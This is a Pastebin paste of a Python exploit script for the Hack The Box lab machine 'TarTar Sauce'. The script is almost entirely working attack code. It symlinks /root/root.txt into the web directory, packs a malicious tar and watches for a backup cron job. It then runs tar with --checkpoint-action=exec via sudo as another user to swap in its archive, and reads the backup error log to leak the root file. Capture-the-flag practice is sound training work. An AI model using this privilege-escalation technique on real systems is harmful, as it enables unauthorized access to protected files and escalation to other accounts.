daily pastebin goal
47%
SHARE
TWEET

Untitled

a guest Oct 21st, 2018 396 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #HtB.eu TarTar Sauce to root.txt python exploit
  3.  
  4. from os import system
  5.  
  6. import datetime
  7.  
  8. import os
  9.  
  10. import subprocess
  11.  
  12. import time
  13.  
  14. count = 0
  15.  
  16. global process_name
  17.  
  18. process_name = "backuperer"
  19.  
  20. global tarunnin
  21.  
  22. tarunnin = "tar"
  23.  
  24. global sleepyet
  25.  
  26. sleepyet = "sleep"
  27.  
  28. global wtdiff
  29.  
  30. wtdiff = "diff"
  31.  
  32. global maltar
  33.  
  34. maltar = "maltar.tar"
  35.  
  36. #def cleanup():
  37.  
  38. #   tmp = os.popen("rm maltar.tar shell.sh")
  39.  
  40. #   print "clean slate bitches"
  41.  
  42. #   return
  43.  
  44.    
  45.  
  46. def create_simlink():
  47.  
  48.     simlinktest = os.popen("ln -s /root/root.txt /var/www/html/boobies.txt").read()
  49.  
  50.     simthere = os.popen("ls -a /var/www/html/ | grep -E 'boobies.txt'").read()
  51.  
  52.     print ("we made " + str(simthere) + " at: " + str(datetime.datetime.now()))
  53.  
  54.     print ""
  55.  
  56.     return
  57.  
  58.  
  59.  
  60. def create_mal_tar():
  61.  
  62.     tmp = os.popen("tar zvcPf " + maltar + " /var/www/html/").read()
  63.  
  64.     tmpchk = os.popen("ls -a " + str(maltar)).read()
  65.  
  66.     print ("file: " + str(tmpchk) + " created at: " + str(datetime.datetime.now()))
  67.  
  68.     print ""
  69.  
  70.     return
  71.  
  72.    
  73.  
  74. def rm_simlink():
  75.  
  76.     tmp = os.popen("rm /var/www/html/boobies.txt").read()
  77.  
  78.     tmpchk = os.popen("ls /var/www/html/ |grep boob*").read()
  79.  
  80.     print ("is there boobie.txt?   " + str(tmpchk))
  81.  
  82.     print ""
  83.  
  84.     return
  85.  
  86.  
  87.  
  88. def check_process(prcssname):
  89.  
  90.     print ("looking for " + prcssname + " at: " + str(datetime.datetime.now()))
  91.  
  92.     while True:
  93.  
  94.         tmp = os.popen("ps -e").read()
  95.  
  96.         if prcssname not in tmp[:]:
  97.  
  98.             continue
  99.  
  100.         else:
  101.  
  102.             dttime = datetime.datetime.now()
  103.  
  104.             print (prcssname + " ran at: " + str(dttime))
  105.  
  106.             print ""
  107.  
  108.             break
  109.  
  110.     return
  111.  
  112.        
  113.  
  114. def check_for_tmpfile():
  115.  
  116.     print "lets find that tmpfile name"
  117.  
  118.     while True:
  119.  
  120.         global tmpfile
  121.  
  122.         tmpfile = os.popen("ls -a /var/tmp |grep -E '[.]\w{10,}'").read()
  123.  
  124.         if tmpfile == "":
  125.  
  126.             continue #keep tryin
  127.  
  128.         else:
  129.  
  130.             dttime = datetime.datetime.now()
  131.  
  132.             print (tmpfile + " is the tmpfile name")
  133.  
  134.             print ("found at: " + str(dttime))
  135.  
  136.             print ""
  137.  
  138.             break
  139.  
  140.     return
  141.  
  142.  
  143.  
  144. def tmpfile_check():
  145.  
  146.     print ("tmpfile variable really global? " + str(tmpfile))
  147.  
  148.     print ""
  149.  
  150.     return
  151.  
  152.  
  153.  
  154. def makin_copies(newtar):
  155.  
  156.     dttime = datetime.datetime.now()
  157.  
  158.     tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
  159.  
  160.     print ""
  161.  
  162.     print ("hash for legit tar: " + str(tmphash))
  163.  
  164.     print ""
  165.  
  166.     tmp = "#!/bin/bash"
  167.  
  168.     print ("makin copies of " + str(newtar) + " at: " + str(dttime))
  169.  
  170.     tmpsh = os.popen("echo '" + str(tmp) + "' >> shell.sh").read()
  171.  
  172.     tmpsh = os.popen("echo 'cp " + maltar + " /var/tmp/" + tmpfile + "' >> shell.sh").read()
  173.  
  174.     tmpsh = os.popen("chmod +x ./shell.sh").read()
  175.  
  176.     tmpsh = os.popen("sudo -u onuma tar cf /tmp/archive.tar --checkpoint = 1 --checkpoint-action=exec=sh shell.sh").read()
  177.  
  178.     tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
  179.  
  180.     print ("new tar hash: " + str(tmphash))
  181.  
  182.     print ""
  183.  
  184.     return
  185.  
  186.    
  187.  
  188. def sleep_a_sec():
  189.  
  190.     dttime = datetime.datetime.now()
  191.  
  192.     print ("waiting 15 sec start now: " + str(dttime))
  193.  
  194.     time.sleep(15)
  195.  
  196.     dttime = datetime.datetime.now()
  197.  
  198.     print ("has it been 5 seconds?" + str(dttime))
  199.  
  200.     print ""
  201.  
  202.     return
  203.  
  204.    
  205.  
  206. def cat_log():
  207.  
  208.     #tmp = os.popen("cat /var/backups/onuma_backup_error.txt |grep boobies.txt").read()
  209.  
  210.     tmp = os.popen("tail -n 50 /var/backups/onuma_backup_error.txt | grep \>").read()
  211.  
  212.     print "hash should be near /"
  213.  
  214.     print ""
  215.  
  216.     print str(tmp)
  217.  
  218.     exit
  219.  
  220.  
  221.  
  222. #cleanup()
  223.  
  224. startshitright = os.popen("rmdir /var/tmp/.b && mkdir /var/tmp/.b && cd /var/tmp/.b").read()
  225.  
  226. print "started right"
  227.  
  228. create_simlink()
  229.  
  230.  
  231.  
  232. create_mal_tar()
  233.  
  234.  
  235.  
  236. rm_simlink()
  237.  
  238.  
  239.  
  240. check_process(process_name)
  241.  
  242.  
  243.  
  244. check_process(tarunnin)
  245.  
  246.  
  247.  
  248. check_process(sleepyet)
  249.  
  250.  
  251.  
  252. sleep_a_sec()
  253.  
  254.  
  255.  
  256. check_for_tmpfile()
  257.  
  258.  
  259.  
  260. #makin_copies(tmpfile)
  261.  
  262. check_process(wtdiff)
  263.  
  264.  
  265.  
  266. #time.sleep(25)
  267.  
  268. makin_copies(tmpfile)
  269.  
  270. cat_log()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top